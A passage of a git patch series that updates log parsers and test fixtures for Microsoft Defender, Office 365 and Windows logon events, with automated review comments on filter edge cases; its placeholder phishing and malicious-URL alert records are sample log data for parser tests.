self._\\\"}\", \"InitiatingProcessAccountSid\": null, \"AppGuardContainerId\": null, \"InitiatingProcessSHA256\": null, \"SHA256\": \"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\", \"RemoteUrl\": null, \"ProcessCreationTime\": null, 
\"ProcessTokenElevation\": null, \"ActionType\": \"ScriptContent\", \"FileOriginUrl\": null, \"FileOriginIP\": null, \"InitiatingProcessLogonId\": 0, \"AccountSid\": null, \"RemoteDeviceName\": null, \"RegistryKey\": null, \"RegistryValueName\": null, \"RegistryValueData\": null, \"LogonId\": null, \"LocalIP\": null, \"LocalPort\": null, \"RemoteIP\": null, \"RemotePort\": null, \"ProcessId\": null, \"ProcessCommandLine\": null, \"InitiatingProcessAccountUpn\": null, \"InitiatingProcessAccountObjectId\": null, \"FileSize\": null, \"InitiatingProcessFileSize\": null, \"InitiatingProcessVersionInfoCompanyName\": null, \"InitiatingProcessVersionInfoProductName\": null, \"InitiatingProcessVersionInfoProductVersion\": null, \"InitiatingProcessVersionInfoInternalFileName\": null, \"InitiatingProcessVersionInfoOriginalFileName\": null, \"InitiatingProcessVersionInfoFileDescription\": null, \"InitiatingProcessSessionId\": null, \"IsInitiatingProcessRemoteSession\": false, \"InitiatingProcessRemoteSessionDeviceName\": null, \"InitiatingProcessRemoteSessionIP\": null, \"CreatedProcessSessionId\": null, \"IsProcessRemoteSession\": false, \"ProcessRemoteSessionDeviceName\": null, \"ProcessRemoteSessionIP\": null, \"Timestamp\": \"2024-10-22T15:09:47.246794Z\", \"MachineGroup\": \"Linux Servers - remediate threats automatically\"}, \"Tenant\": \"DefaultTenant\"}", + "event": { + "category": [ + "host" + ], + "dataset": "device_events", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-22T15:09:47.246794Z", + "action": { + "properties": { + "InitiatingProcessLogonId": "0" + }, + "type": "ScriptContent" + }, + "file": { + "hash": { + "sha256": "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + } + }, + "host": { + "id": "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3", + "name": "computer.intranet.example" + }, + "microsoft": { + "defender": { + "report": { + "id": "67420" + } + } + }, + "process": { + "parent": { + "pid": 0 + }, + "pid": 423638, + "start": 
"2024-10-22T15:09:47.165481Z" + }, + "related": { + "hash": [ + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08" + ] + } + } +} \ No newline at end of file From 888b0691245519b5dcea6193ef6658dab8951dd7 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 29 Oct 2024 07:58:50 +0200 Subject: [PATCH 172/317] Fix linting --- .../tests/test_device_process_events_2.json | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json index 808ffdbdb..d2e83b32a 100644 --- a/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json +++ b/Microsoft/microsoft-365-defender/tests/test_device_process_events_2.json @@ -66,8 +66,8 @@ }, "related": { "hash": [ - "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", "098f6bcd4621d373cade4e832627b4f6", + "9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08", "a94a8fe5ccb19ba61c4c0873d391e987982fbbd3" ], "user": [ From e38ca0a3e5a0260e038c2cf5fd7601135c6f317f Mon Sep 17 00:00:00 2001 From: rombernier Date: Tue, 29 Oct 2024 09:07:02 +0100 Subject: [PATCH 173/317] add target user name --- Office 365/o365/ingest/parser.yml | 1 + Office 365/o365/tests/source_log.json | 5 +- Office 365/o365/tests/targetusername.json | 114 ++++++++++++++++++++++ 3 files changed, 119 insertions(+), 1 deletion(-) create mode 100644 Office 365/o365/tests/targetusername.json diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index 90f07c4ca..c3239441a 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml 
@@ -78,6 +78,7 @@ stages: organization.id: "{{json_event.message.OrganizationId}}" action.id: "{{json_event.message.RecordType}}" action.name: "{{json_event.message.Operation}}" + user.target.name: "{{json_event.message.TargetUserOrGroupName}}" - set: source.ip: "{{parse_client_ip.result.ip}}" source.port: "{{parse_client_ip.result.port}}" diff --git a/Office 365/o365/tests/source_log.json b/Office 365/o365/tests/source_log.json index ee2d5e8d7..95ecbad6c 100644 --- a/Office 365/o365/tests/source_log.json +++ b/Office 365/o365/tests/source_log.json @@ -77,7 +77,10 @@ "user": { "email": "user@test.io", "id": "i:0h.f|membership|xxxxxx@test.com", - "name": "user@test.io" + "name": "user@test.io", + "target": { + "name": "user@test.io" + } }, "user_agent": { "device": { diff --git a/Office 365/o365/tests/targetusername.json b/Office 365/o365/tests/targetusername.json new file mode 100644 index 000000000..b32a0baa4 --- /dev/null +++ b/Office 365/o365/tests/targetusername.json 
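Review bot: The new `user.target.name` set in the `@@ -78,6 +78,7 @@` hunk copies `TargetUserOrGroupName` unconditionally, although the source record also carries `TargetUserOrGroupType` (the fixture shows `"Member"`), so when the sharing target is a group the group's name lands in a user field. If the type values are as Microsoft documents them, gating the set, e.g. `filter: "{{json_event.message.TargetUserOrGroupType in ['Member', 'Guest']}}"`, would keep `user.target.name` to actual accounts; please confirm the value set against the vendor schema before relying on it. The new `targetusername.json` fixture only exercises the `Member` case, so a group-typed sample would make the distinction testable. The enclosing `set` action starts outside the hunk.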
@@ -0,0 +1,114 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + }, + "message": "{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"EditFalse\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}" + }, + "expected": { + "message": 
"{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"EditFalse\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}", + "event": { + "action": "AddedToSecureLink", + "category": [ + "file" + ], + "code": "14", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-29T07:41:53Z", + "action": { + "id": 14, + "name": "AddedToSecureLink", + "outcome": "success", + "properties": [ + { + "SiteUrl": 
"https://compagny-my.sharepoint.com/personal/usrename", + "SourceFileName": "filename.pdf", + "SourceRelativeUrl": "Documents/filename.pdf", + "UserAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49" + } + ], + "target": "user" + }, + "file": { + "directory": "Documents/filename.pdf", + "extension": "pdf", + "name": "filename.pdf" + }, + "office365": { + "audit": { + "object_id": "https://compagny-my.sharepoint.com/personal/docname.pdf" + }, + "context": { + "aad_session_id": "000-000-000-000", + "client": { + "id": "000-000-000-000", + "name": "Microsoft Teams" + }, + "correlation": { + "id": "000-000-000-000" + } + }, + "record_type": 14, + "user_type": { + "code": 0, + "name": "Regular" + } + }, + "organization": { + "id": "000-000-000-000" + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "user.name@compagny.com" + ] + }, + "service": { + "name": "OneDrive" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "url": { + "domain": "compagny-my.sharepoint.com", + "full": "https://compagny-my.sharepoint.com/personal/docname.pdf", + "original": "https://compagny-my.sharepoint.com/personal/docname.pdf", + "path": "/personal/docname.pdf", + "port": 443, + "registered_domain": "sharepoint.com", + "scheme": "https", + "subdomain": "compagny-my", + "top_level_domain": "com" + }, + "user": { + "email": "user.name@compagny.com", + "id": "userkey@live.com", + "name": "user.name@compagny.com", + "target": { + "name": "target_user_name_value" + } + }, + "user_agent": { + "device": { + "name": "Other" + }, + "name": "Edge", + "original": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49", + "os": { + "name": "Windows", + "version": "10" + }, + "version": "130.0.0" + } + } +} \ No newline at end of file 
From b23ed9b31e0c70e7b28a1cd67a9a158ae3624085 Mon Sep 17 00:00:00 2001 From: rombernier Date: Tue, 29 Oct 2024 09:12:39 +0100 Subject: [PATCH 174/317] add target user name --- Office 365/o365/tests/targetusername.json | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Office 365/o365/tests/targetusername.json b/Office 365/o365/tests/targetusername.json index b32a0baa4..ec3137b79 100644 --- a/Office 365/o365/tests/targetusername.json +++ b/Office 365/o365/tests/targetusername.json 
@@ -1,12 +1,12 @@ { "input": { + "message": "{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"EditFalse\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}", "sekoiaio": { "intake": { "dialect": "Microsoft 365 / Office 365", "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" } - }, - "message": "{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft 
Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"EditFalse\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}" + } }, "expected": { "message": "{\"AppAccessContext\":{\"AADSessionId\":\"000-000-000-000\",\"ClientAppId\":\"000-000-000-000\",\"ClientAppName\":\"Microsoft 
Teams\",\"CorrelationId\":\"000-000-000-000\",\"UniqueTokenId\":\"xxxxxx\"},\"CreationTime\":\"2024-10-29T07:41:53\",\"Id\":\"000-000-000-000\",\"Operation\":\"AddedToSecureLink\",\"OrganizationId\":\"000-000-000-000\",\"RecordType\":14,\"UserKey\":\"userkey@live.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"OneDrive\",\"ClientIP\":\"1.2.3.4\",\"UserId\":\"user.name@compagny.com\",\"ApplicationId\":\"000-000-000-000\",\"AuthenticationType\":\"OAuth\",\"BrowserName\":\"Edge\",\"BrowserVersion\":\"130.0.0.0\",\"CorrelationId\":\"000-000-000-000\",\"EventSource\":\"SharePoint\",\"GeoLocation\":\"EUR\",\"IsManagedDevice\":true,\"ItemType\":\"File\",\"ListId\":\"000-000-000-000\",\"ListItemUniqueId\":\"000-000-000-000\",\"Platform\":\"WinDesktop\",\"Site\":\"000-000-000-000\",\"UserAgent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36 Edg/130.0.0.0 Teams/24257.205.3165.2029/49\",\"WebId\":\"000-000-000-000\",\"DeviceDisplayName\":\"000-000-000-000\",\"EventData\":\"EditFalse\",\"SourceFileExtension\":\"pdf\",\"TargetUserOrGroupType\":\"Member\",\"UniqueSharingId\":\"000-000-000-000\",\"TargetUserOrGroupName\":\"target_user_name_value\",\"SiteUrl\":\"https://compagny-my.sharepoint.com/personal/usrename\",\"SourceRelativeUrl\":\"Documents/filename.pdf\",\"SourceFileName\":\"filename.pdf\",\"ApplicationDisplayName\":\"Microsoft Teams\",\"ObjectId\":\"https://compagny-my.sharepoint.com/personal/docname.pdf\",\"AssociatedAdminUnits\":[\"000-000-000-000\"]}", From b271d017c19110389e9f23dc53129fa8be8890de Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?= <129874202+gcl-sekoia@users.noreply.github.com> Date: Tue, 29 Oct 2024 12:01:52 +0100 Subject: [PATCH 175/317] fix(o365): parse url in TIUrlClickData events --- Office 365/o365/ingest/parser.yml | 7 +++++++ .../microsoft_defender_threatintelligence_url_click.json | 9 +++++++++ 2 files changed, 16 insertions(+) 
diff --git a/Office 365/o365/ingest/parser.yml b/Office 365/o365/ingest/parser.yml index c3239441a..5a2a1b116 100644 --- a/Office 365/o365/ingest/parser.yml +++ b/Office 365/o365/ingest/parser.yml @@ -63,6 +63,8 @@ pipeline: filter: "{{json_event.message.RecordType == 36}}" - name: parse_power_bi filter: "{{json_event.message.RecordType == 20}}" + - name: parse_threat_intelligence_url + filter: "{{json_event.message.RecordType == 41}}" stages: set_common_fields: @@ -652,3 +654,8 @@ stages: actions: - set: user_agent.original: "{{json_event.message.UserAgent}}" + + parse_threat_intelligence_url: + actions: + - set: + url.original: "{{json_event.message.Url}}" diff --git a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json index dc8b8decb..59fdd35ce 100644 --- a/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json +++ b/Office 365/o365/tests/microsoft_defender_threatintelligence_url_click.json @@ -35,6 +35,15 @@ "service": { "name": "ThreatIntelligence" }, + "url": { + "domain": "malicious.domain.com", + "original": "https://malicious.domain.com", + "port": 443, + "registered_domain": "domain.com", + "scheme": "https", + "subdomain": "malicious", + "top_level_domain": "com" + }, "user": { "email": "human@example.org", "id": "ThreatIntel", From 1e40f55486964d9f5324ba1dd8546012bb905f8f Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Tue, 29 Oct 2024 14:42:57 +0100 Subject: [PATCH 176/317] Windows enhancement: parsing of LmPackageName field --- Windows/windows/ingest/parser.yml | 9 +++++++++ Windows/windows/tests/logon_4624.json | 5 +++++ 2 files changed, 14 insertions(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index 5709d4345..988ae3dbc 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml 
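Review bot: The new `parse_threat_intelligence_url` stage in the `@@ -652,3 +654,8 @@` hunk sets `url.original` from `json_event.message.Url` without a presence check, so a RecordType 41 record that lacks `Url` renders an empty template into the field unless the engine drops empty values, which nothing in the hunk shows. A guard such as `filter: "{{json_event.message.Url != null}}"` would make that explicit. A short comment on the pipeline entry in the `@@ -63,6 +63,8 @@` hunk, `# RecordType 41: TIUrlClickData`, would also record what the literal means, since the commit title is currently the only place it is named. The fixture's derived `url.domain`/`url.registered_domain` fields presumably come from a shared URL-parsing stage outside this hunk; worth confirming that stage runs after this one.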
@@ -325,6 +325,15 @@ stages: user.target.domain: "{{json.event.TargetDomainName}}" user.target.id: "{{json.event.TargetUserSid}}" + - set: + package.name: "{{json.event.LmPackageName.split()|first}}" + package.description: "LAN Manager package" + filter: "{{json.event.LmPackageName not in [null, '-']}}" + + - set: + package.version: "{{json.event.LmPackageName.split()|last}}" + filter: "{{json.event.LmPackageName != null and json.event.LmPackageName.split()|length > 1}}" + - set: event.message: "{{json.event.Message}}" # do not include Message containing a json document diff --git a/Windows/windows/tests/logon_4624.json b/Windows/windows/tests/logon_4624.json index 37704e0eb..b466f8bf1 100644 --- a/Windows/windows/tests/logon_4624.json +++ b/Windows/windows/tests/logon_4624.json @@ -62,6 +62,11 @@ "family": "windows", "platform": "windows" }, + "package": { + "description": "LAN Manager package", + "name": "NTLM", + "version": "V2" + }, "process": { "id": 744, "pid": 744, From 49fd0202d7f10cd647e214538cdf18a2e67a7dd8 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Gr=C3=A9goire=20Clermont?= <129874202+gcl-sekoia@users.noreply.github.com> Date: Fri, 25 Oct 2024 11:42:20 +0200 Subject: [PATCH 177/317] fix(o365): Add test case for SecurityComplianceAlert with url --- .../tests/security_compliance_alert_7.json | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 Office 365/o365/tests/security_compliance_alert_7.json diff --git a/Office 365/o365/tests/security_compliance_alert_7.json b/Office 365/o365/tests/security_compliance_alert_7.json new file mode 100644 index 000000000..efc5f5ca6 --- /dev/null +++ b/Office 365/o365/tests/security_compliance_alert_7.json 
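Review bot: The first filter in the `@@ -325,6 +325,15 @@` hunk, `{{json.event.LmPackageName not in [null, '-']}}`, still admits an empty `LmPackageName`, for which `split()|first` has no element to return, so `package.name` would be set from an undefined value; extending it to `filter: "{{json.event.LmPackageName not in [null, '', '-']}}"` closes that case (a whitespace-only value would additionally need `|trim`). The second set is consistent with this only incidentally: `'-'.split()` yields one token, so it is excluded by the length test rather than explicitly. Whether the engine renders an undefined `first` as empty or raises is not visible here, so please confirm against its undefined handling. The `logon_4624.json` hunk covers only the two-token `NTLM V2` case; a `-` sample would pin the filter behaviour.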
@@ -0,0 +1,85 @@ +{ + "input": { + "message": "{\"CreationTime\":\"2024-10-24T09:10:38\",\"Id\":\"9b1762d6-2667-4c2d-ad8f-5faa9b9dbad8\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"3995fc59-1c0e-4812-b0f1-5308a209ef5e\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertEntityId\":\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\",\"AlertId\":\"6c88ef80-67f0-4a32-b1c9-4696ba48a3e4\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"New alert\",\"Data\":\"{\\\"etype\\\":\\\"MalwareFamily\\\",\\\"at\\\":\\\"2024-10-24T09:07:19.0000000Z\\\",\\\"md\\\":\\\"2024-10-24T07:08:32.0000000Z\\\",\\\"sip\\\":null,\\\"ms\\\":\\\" [TEST] Click on this!!!\\\",\\\"imsgid\\\":\\\"\\\",\\\"ttdt\\\":\\\"2024-10-24T09:07:19.0000000Z\\\",\\\"ttr\\\":\\\"Success_MessageQuarantined\\\",\\\"dm\\\":\\\"UrlReputation\\\",\\\"eid\\\":\\\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\\\",\\\"aii\\\":\\\"32c70dd6-ce69-434d-b52a-0d876696fd8d\\\",\\\"thn\\\":\\\"Phish, Malicious\\\",\\\"ts\\\":\\\"2024-10-24T09:06:19.0000000Z\\\",\\\"te\\\":\\\"2024-10-24T09:08:19.0000000Z\\\",\\\"fvs\\\":\\\"Filters\\\",\\\"tpt\\\":\\\"HostedContentFilterPolicy\\\",\\\"tpid\\\":\\\"f0749efa-70b1-4420-94f7-9527b4f7f677\\\",\\\"tid\\\":\\\"3995fc59-1c0e-4812-b0f1-5308a209ef5e\\\",\\\"tht\\\":\\\"Phish, Malicious\\\",\\\"trc\\\":\\\"test.user@example.com\\\",\\\"tsd\\\":\\\"evil@bad.com\\\",\\\"zu\\\":\\\"clickonthis.example.com/api/phishing\\\",\\\"pud\\\":\\\"clickonthis.example.com/api/phishing\\\",\\\"tdc\\\":\\\"1\\\",\\\"cpid\\\":null,\\\"lon\\\":\\\"Protection\\\"}\",\"EntityType\":\"MalwareFamily\",\"Name\":\"Email messages containing malicious URL removed after 
delivery\u200b\",\"PolicyId\":\"55087523-49bd-4bbd-b269-cda496a06d05\",\"Severity\":\"Informational\",\"Source\":\"Office 365 Security & Compliance\",\"Status\":\"Active\"}\n", + "sekoiaio": { + "intake": { + "dialect": "Microsoft 365 / Office 365", + "dialect_uuid": "caa13404-9243-493b-943e-9848cadb1f99" + } + } + }, + "expected": { + "message": "{\"CreationTime\":\"2024-10-24T09:10:38\",\"Id\":\"9b1762d6-2667-4c2d-ad8f-5faa9b9dbad8\",\"Operation\":\"AlertEntityGenerated\",\"OrganizationId\":\"3995fc59-1c0e-4812-b0f1-5308a209ef5e\",\"RecordType\":40,\"ResultStatus\":\"Succeeded\",\"UserKey\":\"SecurityComplianceAlerts\",\"UserType\":4,\"Version\":1,\"Workload\":\"SecurityComplianceCenter\",\"ObjectId\":\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\",\"UserId\":\"SecurityComplianceAlerts\",\"AlertEntityId\":\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\",\"AlertId\":\"6c88ef80-67f0-4a32-b1c9-4696ba48a3e4\",\"AlertLinks\":[{\"AlertLinkHref\":\"\"}],\"AlertType\":\"System\",\"Category\":\"ThreatManagement\",\"Comments\":\"New alert\",\"Data\":\"{\\\"etype\\\":\\\"MalwareFamily\\\",\\\"at\\\":\\\"2024-10-24T09:07:19.0000000Z\\\",\\\"md\\\":\\\"2024-10-24T07:08:32.0000000Z\\\",\\\"sip\\\":null,\\\"ms\\\":\\\" [TEST] Click on this!!!\\\",\\\"imsgid\\\":\\\"\\\",\\\"ttdt\\\":\\\"2024-10-24T09:07:19.0000000Z\\\",\\\"ttr\\\":\\\"Success_MessageQuarantined\\\",\\\"dm\\\":\\\"UrlReputation\\\",\\\"eid\\\":\\\"32c70dd6-ce69-434d-b52a-0d876696fd8d-9402318098831178296-1\\\",\\\"aii\\\":\\\"32c70dd6-ce69-434d-b52a-0d876696fd8d\\\",\\\"thn\\\":\\\"Phish, Malicious\\\",\\\"ts\\\":\\\"2024-10-24T09:06:19.0000000Z\\\",\\\"te\\\":\\\"2024-10-24T09:08:19.0000000Z\\\",\\\"fvs\\\":\\\"Filters\\\",\\\"tpt\\\":\\\"HostedContentFilterPolicy\\\",\\\"tpid\\\":\\\"f0749efa-70b1-4420-94f7-9527b4f7f677\\\",\\\"tid\\\":\\\"3995fc59-1c0e-4812-b0f1-5308a209ef5e\\\",\\\"tht\\\":\\\"Phish, 
Malicious\\\",\\\"trc\\\":\\\"test.user@example.com\\\",\\\"tsd\\\":\\\"evil@bad.com\\\",\\\"zu\\\":\\\"clickonthis.example.com/api/phishing\\\",\\\"pud\\\":\\\"clickonthis.example.com/api/phishing\\\",\\\"tdc\\\":\\\"1\\\",\\\"cpid\\\":null,\\\"lon\\\":\\\"Protection\\\"}\",\"EntityType\":\"MalwareFamily\",\"Name\":\"Email messages containing malicious URL removed after delivery\u200b\",\"PolicyId\":\"55087523-49bd-4bbd-b269-cda496a06d05\",\"Severity\":\"Informational\",\"Source\":\"Office 365 Security & Compliance\",\"Status\":\"Active\"}\n", + "event": { + "action": "AlertEntityGenerated", + "category": [ + "intrusion_detection" + ], + "code": "40", + "kind": "alert", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-10-24T09:10:38Z", + "action": { + "id": 40, + "name": "AlertEntityGenerated", + "outcome": "success", + "target": "user" + }, + "email": { + "from": { + "address": [ + "evil@bad.com" + ] + }, + "message_id": 